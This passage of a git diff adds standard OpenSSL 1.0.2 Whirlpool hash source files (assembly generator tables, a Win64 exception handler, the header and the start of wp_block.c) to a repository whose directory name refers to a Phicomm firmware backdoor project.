+	&LL(0x53,0x53,0x51,0x53,0xa2,0x02,0xa6,0xf1);
+	&LL(0xdc,0xdc,0x57,0xdc,0xae,0x8b,0xa5,0x72);
+	&LL(0x0b,0x0b,0x2c,0x0b,0x58,0x27,0x16,0x53);
+	&LL(0x9d,0x9d,0x4e,0x9d,0x9c,0xd3,0x27,0x01);
+	&LL(0x6c,0x6c,0xad,0x6c,0x47,0xc1,0xd8,0x2b);
+	&LL(0x31,0x31,0xc4,0x31,0x95,0xf5,0x62,0xa4);
+	&LL(0x74,0x74,0xcd,0x74,0x87,0xb9,0xe8,0xf3);
+	&LL(0xf6,0xf6,0xff,0xf6,0xe3,0x09,0xf1,0x15);
+	&LL(0x46,0x46,0x05,0x46,0x0a,0x43,0x8c,0x4c);
+	&LL(0xac,0xac,0x8a,0xac,0x09,0x26,0x45,0xa5);
+	&LL(0x89,0x89,0x1e,0x89,0x3c,0x97,0x0f,0xb5);
+	&LL(0x14,0x14,0x50,0x14,0xa0,0x44,0x28,0xb4);
+	&LL(0xe1,0xe1,0xa3,0xe1,0x5b,0x42,0xdf,0xba);
+	&LL(0x16,0x16,0x58,0x16,0xb0,0x4e,0x2c,0xa6);
+	&LL(0x3a,0x3a,0xe8,0x3a,0xcd,0xd2,0x74,0xf7);
+	&LL(0x69,0x69,0xb9,0x69,0x6f,0xd0,0xd2,0x06);
+	&LL(0x09,0x09,0x24,0x09,0x48,0x2d,0x12,0x41);
+	&LL(0x70,0x70,0xdd,0x70,0xa7,0xad,0xe0,0xd7);
+	&LL(0xb6,0xb6,0xe2,0xb6,0xd9,0x54,0x71,0x6f);
+	&LL(0xd0,0xd0,0x67,0xd0,0xce,0xb7,0xbd,0x1e);
+	&LL(0xed,0xed,0x93,0xed,0x3b,0x7e,0xc7,0xd6);
+	&LL(0xcc,0xcc,0x17,0xcc,0x2e,0xdb,0x85,0xe2);
+	&LL(0x42,0x42,0x15,0x42,0x2a,0x57,0x84,0x68);
+	&LL(0x98,0x98,0x5a,0x98,0xb4,0xc2,0x2d,0x2c);
+	&LL(0xa4,0xa4,0xaa,0xa4,0x49,0x0e,0x55,0xed);
+	&LL(0x28,0x28,0xa0,0x28,0x5d,0x88,0x50,0x75);
+	&LL(0x5c,0x5c,0x6d,0x5c,0xda,0x31,0xb8,0x86);
+	&LL(0xf8,0xf8,0xc7,0xf8,0x93,0x3f,0xed,0x6b);
+	&LL(0x86,0x86,0x22,0x86,0x44,0xa4,0x11,0xc2);
+
+	&L(0x18,0x23,0xc6,0xe8,0x87,0xb8,0x01,0x4f);	# rc[ROUNDS]
+	&L(0x36,0xa6,0xd2,0xf5,0x79,0x6f,0x91,0x52);
+	&L(0x60,0xbc,0x9b,0x8e,0xa3,0x0c,0x7b,0x35);
+	&L(0x1d,0xe0,0xd7,0xc2,0x2e,0x4b,0xfe,0x57);
+	&L(0x15,0x77,0x37,0xe5,0x9f,0xf0,0x4a,0xda);
+	&L(0x58,0xc9,0x29,0x0a,0xb1,0xa0,0x6b,0x85);
+	&L(0xbd,0x5d,0x10,0xf4,0xcb,0x3e,0x05,0x67);
+	&L(0xe4,0x27,0x41,0x8b,0xa7,0x7d,0x95,0xd8);
+	&L(0xfb,0xee,0x7c,0x66,0xdd,0x17,0x47,0x9e);
+	&L(0xca,0x2d,0xbf,0x07,0xad,0x5a,0x83,0x33);
+
+# EXCEPTION_DISPOSITION handler (EXCEPTION_RECORD *rec,ULONG64 frame,
+#		CONTEXT *context,DISPATCHER_CONTEXT *disp)
+if ($win64) {
+$rec="%rcx";
+$frame="%rdx";
+$context="%r8";
+$disp="%r9";
+
+$code.=<<___;
+.extern	__imp_RtlVirtualUnwind
+.type	se_handler,\@abi-omnipotent
+.align	16
+se_handler:
+	push	%rsi
+	push	%rdi
+	push	%rbx
+	push	%rbp
+	push	%r12
+	push	%r13
+	push	%r14
+	push	%r15
+	pushfq
+	sub	\$64,%rsp
+
+	mov	120($context),%rax	# pull context->Rax
+	mov	248($context),%rbx	# pull context->Rip
+
+	lea	.Lprologue(%rip),%r10
+	cmp	%r10,%rbx		# context->Rip<.Lprologue
+	jb	.Lin_prologue
+
+	mov	152($context),%rax	# pull context->Rsp
+
+	lea	.Lepilogue(%rip),%r10
+	cmp	%r10,%rbx		# context->Rip>=.Lepilogue
+	jae	.Lin_prologue
+
+	mov	128+32(%rax),%rax	# pull saved stack pointer
+	lea	48(%rax),%rax
+
+	mov	-8(%rax),%rbx
+	mov	-16(%rax),%rbp
+	mov	-24(%rax),%r12
+	mov	-32(%rax),%r13
+	mov	-40(%rax),%r14
+	mov	-48(%rax),%r15
+	mov	%rbx,144($context)	# restore context->Rbx
+	mov	%rbp,160($context)	# restore context->Rbp
+	mov	%r12,216($context)	# restore context->R12
+	mov	%r13,224($context)	# restore context->R13
+	mov	%r14,232($context)	# restore context->R14
+	mov	%r15,240($context)	# restore context->R15
+
+.Lin_prologue:
+	mov	8(%rax),%rdi
+	mov	16(%rax),%rsi
+	mov	%rax,152($context)	# restore context->Rsp
+	mov	%rsi,168($context)	# restore context->Rsi
+	mov	%rdi,176($context)	# restore context->Rdi
+
+	mov	40($disp),%rdi		# disp->ContextRecord
+	mov	$context,%rsi		# context
+	mov	\$154,%ecx		# sizeof(CONTEXT)
+	.long	0xa548f3fc		# cld; rep movsq
+
+	mov	$disp,%rsi
+	xor	%rcx,%rcx		# arg1, UNW_FLAG_NHANDLER
+	mov	8(%rsi),%rdx		# arg2, disp->ImageBase
+	mov	0(%rsi),%r8		# arg3, disp->ControlPc
+	mov	16(%rsi),%r9		# arg4, disp->FunctionEntry
+	mov	40(%rsi),%r10		# disp->ContextRecord
+	lea	56(%rsi),%r11		# &disp->HandlerData
+	lea	24(%rsi),%r12		# &disp->EstablisherFrame
+	mov	%r10,32(%rsp)		# arg5
+	mov	%r11,40(%rsp)		# arg6
+	mov	%r12,48(%rsp)		# arg7
+	mov	%rcx,56(%rsp)		# arg8, (NULL)
+	call	*__imp_RtlVirtualUnwind(%rip)
+
+	mov	\$1,%eax		# ExceptionContinueSearch
+	add	\$64,%rsp
+	popfq
+	pop	%r15
+	pop	%r14
+	pop	%r13
+	pop	%r12
+	pop	%rbp
+	pop	%rbx
+	pop	%rdi
+	pop	%rsi
+	ret
+.size	se_handler,.-se_handler
+
+.section	.pdata
+.align	4
+	.rva	.LSEH_begin_$func
+	.rva	.LSEH_end_$func
+	.rva	.LSEH_info_$func
+
+.section	.xdata
+.align	8
+.LSEH_info_$func:
+	.byte	9,0,0,0
+	.rva	se_handler
+___
+}
+
+$code =~ s/\`([^\`]*)\`/eval $1/gem;
+print $code;
+close STDOUT;
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/whrlpool/lib b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/whrlpool/lib
new file mode 100644
index 0000000..e69de29
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/whrlpool/whrlpool.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/whrlpool/whrlpool.h
new file mode 100644
index 0000000..73c749d
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/whrlpool/whrlpool.h
@@ -0,0 +1,41 @@
+#ifndef HEADER_WHRLPOOL_H
+# define HEADER_WHRLPOOL_H
+
+# include <openssl/e_os2.h>
+# include <stddef.h>
+
+#ifdef __cplusplus
+extern "C" {
+#endif
+
+# define WHIRLPOOL_DIGEST_LENGTH (512/8)
+# define WHIRLPOOL_BBLOCK        512
+# define WHIRLPOOL_COUNTER       (256/8)
+
+typedef struct {
+    union {
+        unsigned char c[WHIRLPOOL_DIGEST_LENGTH];
+        /* double q is here to ensure 64-bit alignment */
+        double q[WHIRLPOOL_DIGEST_LENGTH / sizeof(double)];
+    } H;
+    unsigned char data[WHIRLPOOL_BBLOCK / 8];
+    unsigned int bitoff;
+    size_t bitlen[WHIRLPOOL_COUNTER / sizeof(size_t)];
+} WHIRLPOOL_CTX;
+
+# ifndef OPENSSL_NO_WHIRLPOOL
+#  ifdef OPENSSL_FIPS
+int private_WHIRLPOOL_Init(WHIRLPOOL_CTX *c);
+#  endif
+int WHIRLPOOL_Init(WHIRLPOOL_CTX *c);
+int WHIRLPOOL_Update(WHIRLPOOL_CTX *c, const void *inp, size_t bytes);
+void WHIRLPOOL_BitUpdate(WHIRLPOOL_CTX *c, const void *inp, size_t bits);
+int WHIRLPOOL_Final(unsigned char *md, WHIRLPOOL_CTX *c);
+unsigned char *WHIRLPOOL(const void *inp, size_t bytes, unsigned char *md);
+# endif
+
+#ifdef __cplusplus
+}
+#endif
+
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/whrlpool/wp_block.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/whrlpool/wp_block.c
new file mode 100644
index 0000000..920430b
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/whrlpool/wp_block.c
@@ -0,0 +1,780 @@
+/**
+ * The Whirlpool hashing function.
+ *
+ * <P>
+ * <b>References</b>
+ *
+ * <P>
+ * The Whirlpool algorithm was developed by
+ * <a href="mailto:pbarreto@scopus.com.br">Paulo S. L. M. Barreto</a> and
+ * <a href="mailto:vincent.rijmen@cryptomathic.com">Vincent Rijmen</a>.
+ *
+ * See
+ *      P.S.L.M. Barreto, V. Rijmen,
+ *      ``The Whirlpool hashing function,''
+ *      NESSIE submission, 2000 (tweaked version, 2001),
+ *      <https://www.cosic.esat.kuleuven.ac.be/nessie/workshop/submissions/whirlpool.zip>
+ *
+ * Based on "@version 3.0 (2003.03.12)" by Paulo S.L.M. Barreto and
+ * Vincent Rijmen. Lookup "reference implementations" on
+ * <http://planeta.terra.com.br/informatica/paulobarreto/>
+ *
+ * =============================================================================
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE AUTHORS ''AS IS'' AND ANY EXPRESS
+ * OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
+ * WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHORS OR CONTRIBUTORS BE
+ * LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
+ * CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
+ * SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR
+ * BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
+ * WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE
+ * OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
+ * EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+ *
+ */
+
+#include "wp_locl.h"
+#include <string.h>
+
+typedef unsigned char u8;
+#if (defined(_WIN32) || defined(_WIN64)) && !defined(__MINGW32)
+typedef unsigned __int64 u64;
+#elif defined(__arch64__)
+typedef unsigned long u64;
+#else
+typedef unsigned long long u64;
+#endif
+
+#define ROUNDS  10
+
+#define STRICT_ALIGNMENT
+#if defined(__i386) || defined(__i386__) || \
+    defined(__x86_64) || defined(__x86_64__) || \
+    defined(_M_IX86) || defined(_M_AMD64) || defined(_M_X64)
+/*
+ * Well, formally there're couple of other architectures, which permit
+ * unaligned loads, specifically those not crossing cache lines, IA-64 and
+ * PowerPC...
+ */
+# undef STRICT_ALIGNMENT
+#endif
+
+#undef SMALL_REGISTER_BANK
+#if defined(__i386) || defined(__i386__) || defined(_M_IX86)
+# define SMALL_REGISTER_BANK
+# if defined(WHIRLPOOL_ASM)
+#  ifndef OPENSSL_SMALL_FOOTPRINT
+/*
+ * it appears that for elder non-MMX
+ * CPUs this is actually faster!
+ */
+#   define OPENSSL_SMALL_FOOTPRINT
+#  endif
+#  define GO_FOR_MMX(ctx,inp,num)     do {                    \
+        extern unsigned int OPENSSL_ia32cap_P[];                \
+        void whirlpool_block_mmx(void *,const void *,size_t);   \
+        if (!(OPENSSL_ia32cap_P[0] & (1<<23)))  break;          \
+        whirlpool_block_mmx(ctx->H.c,inp,num);  return;         \
+                                        } while (0)
+# endif
+#endif
+
+#undef ROTATE
+#if defined(_MSC_VER)
+# if defined(_WIN64)            /* applies to both IA-64 and AMD64 */
+#  pragma intrinsic(_rotl64)
+#  define ROTATE(a,n) _rotl64((a),n)
+# endif
+#elif defined(__GNUC__) && __GNUC__>=2
+# if defined(__x86_64) || defined(__x86_64__)
+#  if defined(L_ENDIAN)
+#   define ROTATE(a,n)       ({ u64 ret; asm ("rolq %1,%0"   \
+                                   : "=r"(ret) : "J"(n),"0"(a) : "cc"); ret; })
+#  elif defined(B_ENDIAN)
+       /*
+        * Most will argue that x86_64 is always little-endian. Well, yes, but
+        * then we have stratus.com who has modified gcc to "emulate"
+        * big-endian on x86. Is there evidence that they [or somebody else]
+        * won't do same for x86_64? Naturally no. And this line is waiting
+        * ready for that brave soul:-)
+        */
+#   define ROTATE(a,n)       ({ u64 ret; asm ("rorq %1,%0"   \
+                                   : "=r"(ret) : "J"(n),"0"(a) : "cc"); ret; })
+#  endif
+# elif defined(__ia64) || defined(__ia64__)
+#  if defined(L_ENDIAN)
+#   define ROTATE(a,n)       ({ u64 ret; asm ("shrp %0=%1,%1,%2"     \
+                                   : "=r"(ret) : "r"(a),"M"(64-(n))); ret; })
+#  elif defined(B_ENDIAN)
+#   define ROTATE(a,n)       ({ u64 ret; asm ("shrp %0=%1,%1,%2"     \
+                                   : "=r"(ret) : "r"(a),"M"(n)); ret; })
+#  endif
+# endif
+#endif
+
+#if defined(OPENSSL_SMALL_FOOTPRINT)
+# if !defined(ROTATE)
+#  if defined(L_ENDIAN)         /* little-endians have to rotate left */
+#   define ROTATE(i,n)       ((i)<<(n) ^ (i)>>(64-n))
+#  elif defined(B_ENDIAN)       /* big-endians have to rotate right */
+#   define ROTATE(i,n)       ((i)>>(n) ^ (i)<<(64-n))
+#  endif
+# endif
+# if defined(ROTATE) && !defined(STRICT_ALIGNMENT)
+#  define STRICT_ALIGNMENT      /* ensure smallest table size */
+# endif
+#endif
+
+/*
+ * Table size depends on STRICT_ALIGNMENT and whether or not endian-
+ * specific ROTATE macro is defined. If STRICT_ALIGNMENT is not
+ * defined, which is normally the case on x86[_64] CPUs, the table is
+ * 4KB large unconditionally. Otherwise if ROTATE is defined, the
+ * table is 2KB large, and otherwise - 16KB. 2KB table requires a
+ * whole bunch of additional rotations, but I'm willing to "trade,"
+ * because 16KB table certainly trashes L1 cache. I wish all CPUs
+ * could handle unaligned load as 4KB table doesn't trash the cache,
+ * nor does it require additional rotations.
+ */
+/*
+ * Note that every Cn macro expands as two loads: one byte load and
+ * one quadword load. One can argue that that many single-byte loads
+ * is too excessive, as one could load a quadword and "milk" it for
+ * eight 8-bit values instead. Well, yes, but in order to do so *and*
+ * avoid excessive loads you have to accomodate a handful of 64-bit
+ * values in the register bank and issue a bunch of shifts and mask.
+ * It's a tradeoff: loads vs. shift and mask in big register bank[!].
+ * On most CPUs eight single-byte loads are faster and I let other
+ * ones to depend on smart compiler to fold byte loads if beneficial.
+ * Hand-coded assembler would be another alternative:-)
+ */
+#ifdef STRICT_ALIGNMENT
+# if defined(ROTATE)
+#  define N   1
+#  define LL(c0,c1,c2,c3,c4,c5,c6,c7) c0,c1,c2,c3,c4,c5,c6,c7
+#  define C0(K,i)     (Cx.q[K.c[(i)*8+0]])
+#  define C1(K,i)     ROTATE(Cx.q[K.c[(i)*8+1]],8)
+#  define C2(K,i)     ROTATE(Cx.q[K.c[(i)*8+2]],16)
+#  define C3(K,i)     ROTATE(Cx.q[K.c[(i)*8+3]],24)
+#  define C4(K,i)     ROTATE(Cx.q[K.c[(i)*8+4]],32)
+#  define C5(K,i)     ROTATE(Cx.q[K.c[(i)*8+5]],40)
+#  define C6(K,i)     ROTATE(Cx.q[K.c[(i)*8+6]],48)
+#  define C7(K,i)     ROTATE(Cx.q[K.c[(i)*8+7]],56)
+# else
+#  define N   8
+#  define LL(c0,c1,c2,c3,c4,c5,c6,c7) c0,c1,c2,c3,c4,c5,c6,c7, \
+                                        c7,c0,c1,c2,c3,c4,c5,c6, \
+                                        c6,c7,c0,c1,c2,c3,c4,c5, \
+                                        c5,c6,c7,c0,c1,c2,c3,c4, \
+                                        c4,c5,c6,c7,c0,c1,c2,c3, \
+                                        c3,c4,c5,c6,c7,c0,c1,c2, \
+                                        c2,c3,c4,c5,c6,c7,c0,c1, \
+                                        c1,c2,c3,c4,c5,c6,c7,c0
+#  define C0(K,i)     (Cx.q[0+8*K.c[(i)*8+0]])
+#  define C1(K,i)     (Cx.q[1+8*K.c[(i)*8+1]])
+#  define C2(K,i)     (Cx.q[2+8*K.c[(i)*8+2]])
+#  define C3(K,i)     (Cx.q[3+8*K.c[(i)*8+3]])
+#  define C4(K,i)     (Cx.q[4+8*K.c[(i)*8+4]])
+#  define C5(K,i)     (Cx.q[5+8*K.c[(i)*8+5]])
+#  define C6(K,i)     (Cx.q[6+8*K.c[(i)*8+6]])
+#  define C7(K,i)     (Cx.q[7+8*K.c[(i)*8+7]])
+# endif
+#else
+# define N     2
+# define LL(c0,c1,c2,c3,c4,c5,c6,c7)   c0,c1,c2,c3,c4,c5,c6,c7, \
+                                        c0,c1,c2,c3,c4,c5,c6,c7
+# define C0(K,i)       (((u64*)(Cx.c+0))[2*K.c[(i)*8+0]])
+# define C1(K,i)       (((u64*)(Cx.c+7))[2*K.c[(i)*8+1]])
+# define C2(K,i)       (((u64*)(Cx.c+6))[2*K.c[(i)*8+2]])
+# define C3(K,i)       (((u64*)(Cx.c+5))[2*K.c[(i)*8+3]])
+# define C4(K,i)       (((u64*)(Cx.c+4))[2*K.c[(i)*8+4]])
+# define C5(K,i)       (((u64*)(Cx.c+3))[2*K.c[(i)*8+5]])
+# define C6(K,i)       (((u64*)(Cx.c+2))[2*K.c[(i)*8+6]])
+# define C7(K,i)       (((u64*)(Cx.c+1))[2*K.c[(i)*8+7]])
+#endif
+
+static const
+    union {
+    u8 c[(256 * N + ROUNDS) * sizeof(u64)];
+    u64 q[(256 * N + ROUNDS)];
+} Cx = {
+        {
+            /* Note endian-neutral representation:-) */
+            LL(0x18, 0x18, 0x60, 0x18, 0xc0, 0x78, 0x30, 0xd8),
+            LL(0x23, 0x23, 0x8c, 0x23, 0x05, 0xaf, 0x46, 0x26),
+            LL(0xc6, 0xc6, 0x3f, 0xc6, 0x7e, 0xf9, 0x91, 0xb8),
+            LL(0xe8, 0xe8, 0x87, 0xe8, 0x13, 0x6f, 0xcd, 0xfb),
+            LL(0x87, 0x87, 0x26, 0x87, 0x4c, 0xa1, 0x13, 0xcb),
+            LL(0xb8, 0xb8, 0xda, 0xb8, 0xa9, 0x62, 0x6d, 0x11),
+            LL(0x01, 0x01, 0x04, 0x01, 0x08, 0x05, 0x02, 0x09),
+            LL(0x4f, 0x4f, 0x21, 0x4f, 0x42, 0x6e, 0x9e, 0x0d),
+            LL(0x36, 0x36, 0xd8, 0x36, 0xad, 0xee, 0x6c, 0x9b),
+            LL(0xa6, 0xa6, 0xa2, 0xa6, 0x59, 0x04, 0x51, 0xff),
+            LL(0xd2, 0xd2, 0x6f, 0xd2, 0xde, 0xbd, 0xb9, 0x0c),
+            LL(0xf5, 0xf5, 0xf3, 0xf5, 0xfb, 0x06, 0xf7, 0x0e),
+            LL(0x79, 0x79, 0xf9, 0x79, 0xef, 0x80, 0xf2, 0x96),
+            LL(0x6f, 0x6f, 0xa1, 0x6f, 0x5f, 0xce, 0xde, 0x30),
+            LL(0x91, 0x91, 0x7e, 0x91, 0xfc, 0xef, 0x3f, 0x6d),
+            LL(0x52, 0x52, 0x55, 0x52, 0xaa, 0x07, 0xa4, 0xf8),
+            LL(0x60, 0x60, 0x9d, 0x60, 0x27, 0xfd, 0xc0, 0x47),
+            LL(0xbc, 0xbc, 0xca, 0xbc, 0x89, 0x76, 0x65, 0x35),
+            LL(0x9b, 0x9b, 0x56, 0x9b, 0xac, 0xcd, 0x2b, 0x37),
+            LL(0x8e, 0x8e, 0x02, 0x8e, 0x04, 0x8c, 0x01, 0x8a),
+            LL(0xa3, 0xa3, 0xb6, 0xa3, 0x71, 0x15, 0x5b, 0xd2),
+            LL(0x0c, 0x0c, 0x30, 0x0c, 0x60, 0x3c, 0x18, 0x6c),
+            LL(0x7b, 0x7b, 0xf1, 0x7b, 0xff, 0x8a, 0xf6, 0x84),
+            LL(0x35, 0x35, 0xd4, 0x35, 0xb5, 0xe1, 0x6a, 0x80),
+            LL(0x1d, 0x1d, 0x74, 0x1d, 0xe8, 0x69, 0x3a, 0xf5),
+            LL(0xe0, 0xe0, 0xa7, 0xe0, 0x53, 0x47, 0xdd, 0xb3),
+            LL(0xd7, 0xd7, 0x7b, 0xd7, 0xf6, 0xac, 0xb3, 0x21),
+            LL(0xc2, 0xc2, 0x2f, 0xc2, 0x5e, 0xed, 0x99, 0x9c),
+            LL(0x2e, 0x2e, 0xb8, 0x2e, 0x6d, 0x96, 0x5c, 0x43),
+            LL(0x4b, 0x4b, 0x31, 0x4b, 0x62, 0x7a, 0x96, 0x29),
+            LL(0xfe, 0xfe, 0xdf, 0xfe, 0xa3, 0x21, 0xe1, 0x5d),
+            LL(0x57, 0x57, 0x41, 0x57, 0x82, 0x16, 0xae, 0xd5),
+            LL(0x15, 0x15, 0x54, 0x15, 0xa8, 0x41, 0x2a, 0xbd),
+            LL(0x77, 0x77, 0xc1, 0x77, 0x9f, 0xb6, 0xee, 0xe8),
+            LL(0x37, 0x37, 0xdc, 0x37, 0xa5, 0xeb, 0x6e, 0x92),
+            LL(0xe5, 0xe5, 0xb3, 0xe5, 0x7b, 0x56, 0xd7, 0x9e),
+            LL(0x9f, 0x9f, 0x46, 0x9f, 0x8c, 0xd9, 0x23, 0x13),
+            LL(0xf0, 0xf0, 0xe7, 0xf0, 0xd3, 0x17, 0xfd, 0x23),
+            LL(0x4a, 0x4a, 0x35, 0x4a, 0x6a, 0x7f, 0x94, 0x20),
+            LL(0xda, 0xda, 0x4f, 0xda, 0x9e, 0x95, 0xa9, 0x44),
+            LL(0x58, 0x58, 0x7d, 0x58, 0xfa, 0x25, 0xb0, 0xa2),
+            LL(0xc9, 0xc9, 0x03, 0xc9, 0x06, 0xca, 0x8f, 0xcf),
+            LL(0x29, 0x29, 0xa4, 0x29, 0x55, 0x8d, 0x52, 0x7c),
+            LL(0x0a, 0x0a, 0x28, 0x0a, 0x50, 0x22, 0x14, 0x5a),
+            LL(0xb1, 0xb1, 0xfe, 0xb1, 0xe1, 0x4f, 0x7f, 0x50),
+            LL(0xa0, 0xa0, 0xba, 0xa0, 0x69, 0x1a, 0x5d, 0xc9),
+            LL(0x6b, 0x6b, 0xb1, 0x6b, 0x7f, 0xda, 0xd6, 0x14),
+            LL(0x85, 0x85, 0x2e, 0x85, 0x5c, 0xab, 0x17, 0xd9),
+            LL(0xbd, 0xbd, 0xce, 0xbd, 0x81, 0x73, 0x67, 0x3c),
+            LL(0x5d, 0x5d, 0x69, 0x5d, 0xd2, 0x34, 0xba, 0x8f),
+            LL(0x10, 0x10, 0x40, 0x10, 0x80, 0x50, 0x20, 0x90),
+            LL(0xf4, 0xf4, 0xf7, 0xf4, 0xf3, 0x03, 0xf5, 0x07),
+            LL(0xcb, 0xcb, 0x0b, 0xcb, 0x16, 0xc0, 0x8b, 0xdd),
+            LL(0x3e, 0x3e, 0xf8, 0x3e, 0xed, 0xc6, 0x7c, 0xd3),
+            LL(0x05, 0x05, 0x14, 0x05, 0x28, 0x11, 0x0a, 0x2d),
+            LL(0x67, 0x67, 0x81, 0x67, 0x1f, 0xe6, 0xce, 0x78),
+            LL(0xe4, 0xe4, 0xb7, 0xe4, 0x73, 0x53, 0xd5, 0x97),
+            LL(0x27, 0x27, 0x9c, 0x27, 0x25, 0xbb, 0x4e, 0x02),
+            LL(0x41, 0x41, 0x19, 0x41, 0x32, 0x58, 0x82, 0x73),
+            LL(0x8b, 0x8b, 0x16, 0x8b, 0x2c, 0x9d, 0x0b, 0xa7),
+            LL(0xa7, 0xa7, 0xa6, 0xa7, 0x51, 0x01, 0x53, 0xf6),
+            LL(0x7d, 0x7d, 0xe9, 0x7d, 0xcf, 0x94, 0xfa, 0xb2),
+            LL(0x95, 0x95, 0x6e, 0x95, 0xdc, 0xfb, 0x37, 0x49),
+            LL(0xd8, 0xd8, 0x47, 0xd8, 0x8e, 0x9f, 0xad, 0x56),
+            LL(0xfb, 0xfb, 0xcb, 0xfb, 0x8b, 0x30, 0xeb, 0x70),
+            LL(0xee, 0xee, 0x9f, 0xee, 0x23, 0x71, 0xc1, 0xcd),
+            LL(0x7c, 0x7c, 0xed, 0x7c, 0xc7, 0x91, 0xf8, 0xbb),
+            LL(0x66, 0x66, 0x85, 0x66, 0x17, 0xe3, 0xcc, 0x71),
+            LL(0xdd, 0xdd, 0x53, 0xdd, 0xa6, 0x8e, 0xa7, 0x7b),
+            LL(0x17, 0x17, 0x5c, 0x17, 0xb8, 0x4b, 0x2e, 0xaf),
+            LL(0x47, 0x47, 0x01, 0x47, 0x02, 0x46, 0x8e, 0x45),
+            LL(0x9e, 0x9e, 0x42, 0x9e, 0x84, 0xdc, 0x21, 0x1a),
+            LL(0xca, 0xca, 0x0f, 0xca, 0x1e, 0xc5, 0x89, 0xd4),
+            LL(0x2d, 0x2d, 0xb4, 0x2d, 0x75, 0x99, 0x5a, 0x58),
+            LL(0xbf, 0xbf, 0xc6, 0xbf, 0x91, 0x79, 0x63, 0x2e),
+            LL(0x07, 0x07, 0x1c, 0x07, 0x38, 0x1b, 0x0e, 0x3f),
+            LL(0xad, 0xad, 0x8e, 0xad, 0x01, 0x23, 0x47, 0xac),
+            LL(0x5a, 0x5a, 0x75, 0x5a, 0xea, 0x2f, 0xb4, 0xb0),
+            LL(0x83, 0x83, 0x36, 0x83, 0x6c, 0xb5, 0x1b, 0xef),
+            LL(0x33, 0x33, 0xcc, 0x33, 0x85, 0xff, 0x66, 0xb6),
+            LL(0x63, 0x63, 0x91, 0x63, 0x3f, 0xf2, 0xc6, 0x5c),
+            LL(0x02, 0x02, 0x08, 0x02, 0x10, 0x0a, 0x04, 0x12),
+            LL(0xaa, 0xaa, 0x92, 0xaa, 0x39, 0x38, 0x49, 0x93),
+            LL(0x71, 0x71, 0xd9, 0x71, 0xaf, 0xa8, 0xe2, 0xde),
+            LL(0xc8, 0xc8, 0x07, 0xc8, 0x0e, 0xcf, 0x8d, 0xc6),
+            LL(0x19, 0x19, 0x64, 0x19, 0xc8, 0x7d, 0x32, 0xd1),
+            LL(0x49, 0x49, 0x39, 0x49, 0x72, 0x70, 0x92, 0x3b),
+            LL(0xd9, 0xd9, 0x43, 0xd9, 0x86, 0x9a, 0xaf, 0x5f),
+            LL(0xf2, 0xf2, 0xef, 0xf2, 0xc3, 0x1d, 0xf9, 0x31),
+            LL(0xe3, 0xe3, 0xab, 0xe3, 0x4b, 0x48, 0xdb, 0xa8),
+            LL(0x5b, 0x5b, 0x71, 0x5b, 0xe2, 0x2a, 0xb6, 0xb9),
+            LL(0x88, 0x88, 0x1a, 0x88, 0x34, 0x92, 0x0d, 0xbc),
+            LL(0x9a, 0x9a, 0x52, 0x9a, 0xa4, 0xc8, 0x29, 0x3e),
+            LL(0x26, 0x26, 0x98, 0x26, 0x2d, 0xbe, 0x4c, 0x0b),
+            LL(0x32, 0x32, 0xc8, 0x32, 0x8d, 0xfa, 0x64, 0xbf),
+            LL(0xb0, 0xb0, 0xfa, 0xb0, 0xe9, 0x4a, 0x7d, 0x59),
+            LL(0xe9, 0xe9, 0x83, 0xe9, 0x1b, 0x6a, 0xcf, 0xf2),
+            LL(0x0f, 0x0f, 0x3c, 0x0f, 0x78, 0x33, 0x1e, 0x77),
+            LL(0xd5, 0xd5, 0x73, 0xd5, 0xe6, 0xa6, 0xb7, 0x33),
+            LL(0x80, 0x80, 0x3a, 0x80, 0x74, 0xba, 0x1d, 0xf4),
+            LL(0xbe, 0xbe, 0xc2, 0xbe, 0x99, 0x7c, 0x61, 0x27),
+            LL(0xcd, 0xcd, 0x13, 0xcd, 0x26, 0xde, 0x87, 0xeb),
+            LL(0x34, 0x34, 0xd0, 0x34, 0xbd, 0xe4, 0x68, 0x89),
+            LL(0x48, 0x48, 0x3d, 0x48, 0x7a, 0x75, 0x90, 0x32),
+            LL(0xff, 0xff, 0xdb, 0xff, 0xab, 0x24, 0xe3, 0x54),
+            LL(0x7a, 0x7a, 0xf5, 0x7a, 0xf7, 0x8f, 0xf4, 0x8d),
+            LL(0x90, 0x90, 0x7a, 0x90, 0xf4, 0xea, 0x3d, 0x64),
+            LL(0x5f, 0x5f, 0x61, 0x5f, 0xc2, 0x3e, 0xbe, 0x9d),
+            LL(0x20, 0x20, 0x80, 0x20, 0x1d, 0xa0, 0x40, 0x3d),
+            LL(0x68, 0x68, 0xbd, 0x68, 0x67, 0xd5, 0xd0, 0x0f),
+            LL(0x1a, 0x1a, 0x68, 0x1a, 0xd0, 0x72, 0x34, 0xca),
+            LL(0xae, 0xae, 0x82, 0xae, 0x19, 0x2c, 0x41, 0xb7),
+            LL(0xb4, 0xb4, 0xea, 0xb4, 0xc9, 0x5e, 0x75, 0x7d),
+            LL(0x54, 0x54, 0x4d, 0x54, 0x9a, 0x19, 0xa8, 0xce),
+            LL(0x93, 0x93, 0x76, 0x93, 0xec, 0xe5, 0x3b, 0x7f),
